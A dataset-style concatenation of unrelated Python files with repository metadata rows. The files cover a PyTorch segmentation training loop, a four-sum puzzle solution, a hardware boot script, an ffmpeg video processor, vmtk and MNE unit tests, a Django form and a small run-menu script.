checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print('=> loaded checkpoint {0} (epoch {1})'.format(args.resume, checkpoint['epoch']))
else:
raise ValueError('=> no checkpoint found at {0}'.format(args.resume))
for epoch in range(start_epoch, args.epochs):
losses = AverageMeter()
print('Training epoch {}'.format(epoch))
model.train()
for i, sample in enumerate(dataset_loader):
cur_iter = epoch * len(dataset_loader) + i
scheduler(optimizer, cur_iter)
inputs = sample['image'].cuda()
target = sample['label'].cuda()
outputs = model(inputs)
loss = criterion(outputs, target)
if np.isnan(loss.item()) or np.isinf(loss.item()):
pdb.set_trace()
losses.update(loss.item(), args.batch_size)
loss.backward()
optimizer.step()
optimizer.zero_grad()
if (i + 1) % 200 == 0:
print('epoch: {0}\t''iter: {1}/{2}\t''lr: {3:.6f}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format(
epoch + 1, i + 1, len(dataset_loader), scheduler.get_lr(optimizer), loss=losses))
if epoch < args.epochs:
if (epoch+1) % 5 == 0:
torch.save({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, model_fname % (epoch + 1))
else:
torch.save({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, model_fname % (epoch + 1))
line0 = 'epoch: {0}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format(
epoch, loss=losses)
with open(record_name, 'a') as f:
f.write(line0)
if line0[-1] != '\n':
f.write('\n')
if epoch%3!=0 and epoch <args.epochs-20:
continue
print('Validate epoch {}'.format(epoch))
model.eval()
evaluator.reset()
test_loss=0.0
for i,sample in enumerate(val_loader):
inputs = sample['image'].cuda()
target = sample['label'].cuda()
with torch.no_grad():
outputs = model(inputs)
# loss = criterion(outputs, target)
# test_loss+=loss.item()
pred=outputs.data.cpu().numpy()
target=target.cpu().numpy()
pred = np.argmax(pred, axis=1)
evaluator.add_batch(target,pred)
Acc = evaluator.Pixel_Accuracy()
Acc_class = evaluator.Pixel_Accuracy_Class()
mIoU = evaluator.Mean_Intersection_over_Union()
FWIoU = evaluator.Frequency_Weighted_Intersection_over_Union()
print("epoch: {}\t Acc:{:.3f}, Acc_class:{:.3f}, mIoU:{:.3f}, fwIoU: {:.3f}".format(epoch,Acc, Acc_class, mIoU, FWIoU))
line1='epoch: {}\t''mIoU: {:.3f}'.format(epoch,mIoU)
with open(record_name, 'a') as f:
f.write(line1)
if line1[-1] != '\n':
f.write('\n')
if __name__ == "__main__":
main()
| 2 | 2 |
test.py | xxaxdxcxx/miscellaneous-code | 0 | 7893 | class Solution:
# dictionary keys are tuples, storing results
# structure of the tuple:
# (level, prev_sum, val_to_include)
# value is number of successful tuples
    def fourSumCount(self, A, B, C, D, prev_sum=0, level=0, sums=None):
"""
:type A: List[int]
:type B: List[int]
:type C: List[int]
:type D: List[int]
:rtype: int
"""
        # use a fresh memo dict per top-level call; a mutable default argument would persist across calls
        sums = {} if sums is None else sums
# base case:
if level == 3:
total = 0
for num in D:
if prev_sum + num == 0:
print("At level 3, 0 total found using entry w/ value {0}".
format(num))
total += 1
return total
total = 0
lists = [A, B, C]
for num in lists[level]:
if level == 0:
print(str(sums))
if (level, prev_sum, num) in sums:
total += sums[(level, prev_sum, num)]
print("Used dictionary entry {0}, making total {1}".
format((level, prev_sum, num), total))
else:
print("Call from level {0} to level {1}; current sum is {2}".
format(level, level + 1, prev_sum + num))
result = self.fourSumCount(A, B, C, D, prev_sum + num,
level + 1, sums)
sums[(level, prev_sum, num)] = result
total += result
if level == 0:
sums = {}
print(sums)
return total
sol = Solution()
A = [1]
B = [-1]
C = [0]
D = [1]
result = sol.fourSumCount(A, B, C, D)
print("Test 1: {0}".format(result))
A = [1, 2]
B = [-2, -1]
C = [-1, 2]
D = [0, 2]
result = sol.fourSumCount(A, B, C, D)
print("Test 2: {0}".format(result))
| 3.46875 | 3 |
src/boot.py | johngtrs/krux | 0 | 7894 | # The MIT License (MIT)
# Copyright (c) 2021 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import machine
from pmu import axp192
from context import Context
from login import Login
from home import Home
import settings
pmu = axp192()
# Enable power management so that if power button is held down 6 secs,
# it shuts off as expected
pmu.enablePMICSleepMode(True)
ctx = Context()
ctx.display.flash_text(settings.load('splash', ( 'Krux' ), strip=False))
while True:
if not Login(ctx).run():
break
if not Home(ctx).run():
break
ctx.display.flash_text(( 'Shutting down..' ))
ctx.clear()
pmu.setEnterSleepMode()
machine.reset()
| 2.15625 | 2 |
smartfields/processors/video.py | suhaibroomy/django-smartfields | 0 | 7895 | <reponame>suhaibroomy/django-smartfields<filename>smartfields/processors/video.py
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError
__all__ = [
'FFMPEGProcessor'
]
class FFMPEGProcessor(ExternalFileProcessor):
duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
error_re = re.compile(r'Invalid data found when processing input')
cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
"-maxrate {maxrate} -bufsize {bufsize} -vf " \
"scale={width}:{height} -threads {threads} -c:a {acodec} {output}"
def stdout_handler(self, line, duration=None):
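        # Parse ffmpeg's console output line by line: first pick up the total duration, then use the
        # running `time=` stamps to report fractional progress; raise on ffmpeg's invalid-input error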
if duration is None:
duration_time = self.duration_re.search(line)
if duration_time:
duration = self.timedict_to_seconds(duration_time.groupdict())
elif duration != 0:
current_time = self.progress_re.search(line)
if current_time:
seconds = self.timedict_to_seconds(current_time.groupdict())
progress = float(seconds)/duration
progress = progress if progress < 1 else 0.99
self.set_progress(progress)
elif self.error_re.search(line):
raise ProcessingError("Invalid video file or unknown video format.")
return (duration,)
def timedict_to_seconds(self, timedict):
seconds = 0
for key, t in six.iteritems(timedict):
if key == 'seconds':
seconds+= int(t)
elif key == 'minutes':
seconds+= int(t)*60
elif key == 'hours':
seconds+= int(t)*3600
return seconds
| 2.453125 | 2 |
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py | ramtingh/vmtk | 0 | 7896 | ## Program: VMTK
## Language: Python
## Date: January 12, 2018
## Version: 1.4
## Copyright (c) <NAME>, <NAME>, All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
## Note: this code was contributed by
## <NAME> (Github @rlizzo)
## University at Buffalo
import pytest
import vmtk.vmtksurfaceconnectivity as connectivity
import os
@pytest.fixture(scope='module')
def aorta_surface_two_segments(input_datadir):
import vmtk.vmtksurfacereader as surfacereader
reader = surfacereader.vmtkSurfaceReader()
reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp')
reader.Execute()
return reader.Surface
def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_largest_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'largest'
connectiv.CleanOutput = 1
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces):
name = __name__ + '_test_extract_closest_to_reference_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ReferenceSurface = aorta_surface_reference
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_closest_to_point.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ClosestPoint = [0.0, 0.0, 0.0]
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
| 2.265625 | 2 |
sssoon/forms.py | Kingpin-Apps/django-sssoon | 2 | 7897 | <gh_stars>1-10
from django import forms
from nocaptcha_recaptcha.fields import NoReCaptchaField
class NewsletterForm(forms.Form):
email = forms.EmailField(label='Email', required=True,
widget=forms.TextInput(attrs={
'id': 'newsletter-email',
'type': 'email',
'title': 'Email',
'name': 'email',
'class': 'form-control transparent',
'placeholder': '<EMAIL>'
}))
captcha = NoReCaptchaField() | 2.375 | 2 |
simple_run_menu.py | william01110111/simple_run_menu | 0 | 7898 | <reponame>william01110111/simple_run_menu
#! /bin/python3
# simple run menu
import os
import stat
def is_file_executable(path):
executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH
if not os.path.isfile(path):
return False
st = os.stat(path)
mode = st.st_mode
if not mode & executable:
return False
return True
def get_files_in_dir(directory):
if directory == '':
directory = '.'
if directory[-1] != '/':
directory += '/'
return [directory + i for i in os.listdir(directory)]
def command_to_name(command):
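    # Turn a script path into a menu label: drop the directory and extension, replace underscores
    # with spaces, and capitalize each word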
filename_with_ext = os.path.basename(command)
filename = filename_with_ext.rsplit('.', 1)[0]
name = filename.replace('_', ' ')
capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()])
return capitalized
class Option:
options = {}
@staticmethod
def add(command):
        # store on the class-level dict; referencing bare `options` here would raise a NameError
        Option.options[command] = Option(command_to_name(command), command, 'a')
def __init__(self, name, command, trigger):
self.name = name
self.command = command
self.trigger = trigger
if __name__ == "__main__":
print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
| 2.90625 | 3 |
mne/io/cnt/tests/test_cnt.py | stevemats/mne-python | 1,953 | 7899 |
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD-3-Clause
import os.path as op
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from mne import pick_types
from mne.datasets import testing
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.cnt import read_raw_cnt
from mne.annotations import read_annotations
data_path = testing.data_path(download=False)
fname = op.join(data_path, 'CNT', 'scan41_short.cnt')
@testing.requires_testing_data
def test_data():
"""Test reading raw cnt files."""
with pytest.warns(RuntimeWarning, match='number of bytes'):
raw = _test_raw_reader(read_raw_cnt, input_fname=fname,
eog='auto', misc=['NA1', 'LEFT_EAR'])
# make sure we use annotations event if we synthesized stim
assert len(raw.annotations) == 6
eog_chs = pick_types(raw.info, eog=True, exclude=[])
assert len(eog_chs) == 2 # test eog='auto'
assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR'] # test bads
# the data has "05/10/200 17:35:31" so it is set to None
assert raw.info['meas_date'] is None
@testing.requires_testing_data
def test_compare_events_and_annotations():
"""Test comparing annotations and events."""
with pytest.warns(RuntimeWarning, match='Could not parse meas date'):
raw = read_raw_cnt(fname)
events = np.array([[333, 0, 7],
[1010, 0, 7],
[1664, 0, 109],
[2324, 0, 7],
[2984, 0, 109]])
annot = read_annotations(fname)
assert len(annot) == 6
assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq'])
assert 'STI 014' not in raw.info['ch_names']
| 2.125 | 2 |